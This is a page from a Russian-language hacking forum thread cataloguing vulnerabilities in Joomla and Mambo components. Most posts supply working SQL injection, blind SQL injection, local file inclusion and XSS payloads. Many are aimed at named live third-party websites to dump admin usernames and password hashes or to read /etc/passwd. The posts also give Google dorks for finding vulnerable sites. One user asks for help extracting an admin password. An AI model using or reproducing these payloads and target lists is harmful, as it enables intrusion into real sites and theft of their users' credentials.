Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

Discussion in 'Веб-уязвимости' started by it's my, 6 Oct 2007.

  1. lzr

    lzr Member

    Joined:
    1 Jan 2009
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    XSS vulnerability in JComments

    Уязвимые верси: 2.1.0.0 [07/08/2009] и, возможно, ранние
    Уведомление JoomlaTune.com: 4 Мая 2010
    Тип уязвимости: XSS
    Статус: исправлено JoomlaTune.com
    Степень опасности: Средний
    Детали уязвимости: пользователь может выполнить произвольный JS код в уязвимом приложении. Уязвимость возникает из-за неправильной идентификации пользователя в "admin.jcomments.php". Успешное проведение атаки с помощью данной уязвимости может привести к потере конфиденциальных данных и краже идентификационной информации в виде куков.

    Атакующий может использовать браузер для проведения атаки:
    Code:
    <form method="POST" action="http://joomla/administrator/index.php" name="main">
    <input type="hidden" name="name" value='ComntrName"><script>alert(document.cookie)</script>'>
    <input type="hidden" name="email" value="[email protected]">
    <input type="hidden" name="comment" value="comment text">
    <input type="hidden" name="published" value="1">
    <input type="hidden" name="option" value="com_jcomments">
    <input type="hidden" name="id" value="1">
    <input type="hidden" name="task" value="save">
    </form>
    <script>
    document.main.submit();
    </script>
    Решение: обновление к более поздней версии

    (c)http://securityvulns.ru/Xdocument887.html
     
    #181 lzr, 27 May 2010
    Last edited: 27 May 2010
    2 people like this.
  2. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    com_elite_experts
    исходников не нашел

    Expl:
    Code:
    index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+--+
    Example:
    Code:
    http://www.razwod.ru/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+--+
    Dopk:
    Code:
    inurl:"option=com_elite_experts"
    //Вроде не боян...
     
    3 people like this.
  3. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    joomla image_com Blind Sql Injection

    Dork
    Code:
     inurl:"com_image"
    Code

    Code:
    site/patch/index.php?option=com_image&view=[sqli]
    site/patch/index.php?option=com_image&Itemid=87&gallery=[sqli]
    site/patch/index.php?option=com_image&view=image&Itemid=[sqli]
    site/patch/index.php?option=com_image&page=[sqli]
    © Inj3ct0r.com [2010-06-14]​
     
    5 people like this.
  4. gars0n

    gars0n Elder - Старейшина

    Joined:
    9 Dec 2009
    Messages:
    483
    Likes Received:
    104
    Reputations:
    65
    Joomla Component com_feedpost XSS vulnerability

    Dork
    Code:
    inurl:"feedpost.php?url="
    XSS EXPLOIT
    Code:
    [COLOR=Cyan][B]HTML INJECTION:[/B][/COLOR] <iframe src=http://own.com/lol.html <
    [COLOR=Cyan][B]ALERT XSS:[/B][/COLOR] <body onload=alert('xss')>
    [COLOR=Cyan][B]GENERAL XSS:[/B][/COLOR] <body onload=JAVASCRIP_HERE>
    VULN IN HERE
    Code:
    http://localhost/joomla/components/com_feedpostold/feedpost.php?url=[XSS]
    Code:
    [COLOR=Cyan][B]Examples:[/B][/COLOR]
    http://localhost/joomla/components/com_feedpostold/feedpost.php?url=<iframe src=http://own.com/lol.html <
    http://localhost/joomla/components/com_feedpostold/feedpost.php?url=<body onload=alert('Inj3ct0r.com')>
    © Inj3ct0r.com​
     
    1 person likes this.
  5. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Joomla Component com_content blind SQL-Injection vulnerability
    Version: --
    Exploit:
    Code:
    index.php?option=com_content&task=view&id=12+and+mid(version(),1,1)=5+--+&Itemid=3&&lang=ru -> true
    index.php?option=com_content&task=view&id=12+and+mid(version(),1,1)=4+--+&Itemid=3&&lang=ru -> false
         
    Example:
    Code:
    http://www.newdiagnostics.dn.ua/index.php?option=com_content&task=view&id=12+and+mid(version(),1,1)=5+--+&Itemid=3&&lang=ru -> true
    http://www.newdiagnostics.dn.ua/index.php?option=com_content&task=view&id=12+and+mid(version(),1,1)=4+--+&Itemid=3&&lang=ru -> false
     
    5 people like this.
  6. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    .:[melkiy]:.
    Так не пойдёт :)

    com_content это стандартный компонент, тоесть если-бы там была SQL считай что ты похекал интырнеты.

    Так что просто
    и без кода ненадо.

    Или разбирайся почему на сайте работает, или давай код и версию.
    Там старенькая на сайте версия, но учитывая популярность я на 99% уверен, что не могли такой баг пропустить в двиге, тем более в параметре ID
     
    1 person likes this.
  7. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    1.5.0 Release Candidate 3 [LFI]

    версию можно посмотреть двумя способами:
    1)в файле configuration.php-dist:
    @version $Id: configuration.php-dist 14401 2010-01-26 14:10:00Z louis $

    2)в хтмл исходниках админки:
    http://www.site.com/administrator/
    <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />

    теперь об уязвимости:
    уязвимая функция require_once в компоненте com_jesubmit&view=,возможно провести LFI,
    конструкция:
    Code:
    http://www.site.com/index.php?option=com_jesubmit&view=[LFI%00]
    пример:
    Code:
    http://www.hillsborofreepress.com/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
     
    #187 547, 27 Jun 2010
    Last edited: 27 Jun 2010
    2 people like this.
  8. Platon

    Platon New Member

    Joined:
    5 Jan 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    1
    Joomla Component com_phocagallery SQL injection Vulnerability

    Народ кто подскажет как раскрутить эту SQL - нужно выудить пасс админа. Спасибо!
     
    #188 Platon, 6 Aug 2010
    Last edited: 6 Aug 2010
  9. Keltos

    Keltos Banned

    Joined:
    8 Jul 2009
    Messages:
    1,558
    Likes Received:
    920
    Reputations:
    520
    Юзай сплойт
     
  10. Platon

    Platon New Member

    Joined:
    5 Jan 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    1
    Keltos - да, понимаю, просто пока я не столь подкован чтобы раскрутить самостоятельно SQL inj. - попросил помощи(составить запрос к SQL).
     
  11. nakurukataоm

    nakurukataоm New Member

    Joined:
    5 Sep 2010
    Messages:
    26
    Likes Received:
    2
    Reputations:
    0
    А точнее никак нельзя?=)


    В общем если кому понадобиться, это версия 1.5.15
     
    #191 nakurukataоm, 8 Sep 2010
    Last edited: 6 Oct 2010
  12. stmc

    stmc New Member

    Joined:
    22 Apr 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Code:
    Joomla Component com_phocagallery SQL injection Vulnerability
    сомнительная уязвимость, учитывая, что
    Code:
    $Itemid = JRequest::getInt( 'Itemid');
     
  13. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Наверное надо оживить тему?-)

    Компонент: com_storedirectory
    Тип: Sql-Inj

    Уязвимость в параметре id:

    PoC:

    http://www.cockburngateway.com.au/index.php?option=com_storedirectory&task=view&id=1+union+select+1,2,concat%28username,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--
     
    #193 z0mbyak, 6 Dec 2010
    Last edited: 6 Dec 2010
    1 person likes this.
  14. Metis

    Metis Member

    Joined:
    29 Nov 2008
    Messages:
    11
    Likes Received:
    5
    Reputations:
    10
    Joomla 1.5-xx

    com_congratulations

    index.php?option=com_congratulations&Itemid=1&task=date&y=2010&m=1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1,1)),0x71),0x71)--


    http://school29.kurgan.cc/index.php?option=com_congratulations&Itemid=1&task=date&y=2010&m=1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+CONCAT_WS(0x3a,username,password)+FROM+jos_users+limit+1,1)),0x71),0x71)--
     
    2 people like this.
  15. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    SQL inj в компоненте com_jeformcr

    Доброго времени суток :)

    SQl-Inj в com_jeformcr

    Уязвимый параметр: id

    Подбор кол-ва колонок через order+by

    PoC:

    http://www.rcreventos.com.br/rcr/index.php?option=com_jeformcr&view=form&id=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users+where+usertype='Super%20Administrator'--

    http://jrfu.org/index.php?option=com_jeformcr&view=form&id=-1+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users+where+usertype='Super%20Administrator'--
     
    1 person likes this.
  16. JOSSe7

    JOSSe7 Banned

    Joined:
    17 Nov 2010
    Messages:
    6
    Likes Received:
    5
    Reputations:
    0
    Уязвимость: SQL Injection Vulnerability
    Компонент: com_idoblog
    Dork: inurl:"com_idoblog"
    Language: php

    http://extensions.joomla.org/extensions/news-production/blog/9218

    Exploit:

    http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
     
  17. usr-bin

    usr-bin New Member

    Joined:
    17 Sep 2010
    Messages:
    22
    Likes Received:
    3
    Reputations:
    5
    Уязвимость: Blind SQL Injection Vulnerability
    Компонент: allCineVid
    Dork: inurl:"com_allcinevid"
    Language: php

    http://www.joomtraders.com


    Exploit:

    http://site/path/index.php?option=com_allcinevid&tmpl=component&id=1 and 1=1
    http://site/path/index.php?option=com_allcinevid&tmpl=component&id=1 and 1=0
     
  18. usr-bin

    usr-bin New Member

    Joined:
    17 Sep 2010
    Messages:
    22
    Likes Received:
    3
    Reputations:
    5
    Уязвимость: Multiple SQL Injection Vulnerability
    Компонент: Portfolio
    Dork: inurl:"com_allcinevid"
    Language: php

    http://www.salvatorefresta.net


    Exploit:

    http://site/path/index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(username,0x34,password),3,4,5 FROM jos_users
     
  19. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    13
    Reputations:
    5
    Joomla active XSS JFilterInput

    Наличие эксплоита: Да
    Активная XSS в Joomla версии 1.6 и более ранних. Уязвимость связана с недостаточной
    фильтрацией входных данных в классе JFilterInput.
    В версии 1.6, к примеру, можно проверить при включенном модуле User:profile, вбив в поле About Me
    следующий код:

    Code:
    <img src="<img src=x"/onerror=alert(1)//">
    В остальных случаях и версиях данной уязвимости подвержен любой модуль который принимает данные от пользователя.
     
  20. White Bear

    White Bear New Member

    Joined:
    3 Apr 2011
    Messages:
    10
    Likes Received:
    4
    Reputations:
    0
    (com_jce) BLIND sql injection vulnerability

    Description:

    JCE makes creating and editing Joomla!®
    content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want,
    without limitations, and without needing to know or learn HTML, XHTML, CSS...

    exploit & p0c

    [!] index.php?option=com_jce&Itemid=[valid Itemid]

    Example p0c

    [!] http://host/index.php?option=com_jce&Itemid=8 <= True
    [!] http://host/index.php?option=com_jce&Itemid=-8 <= False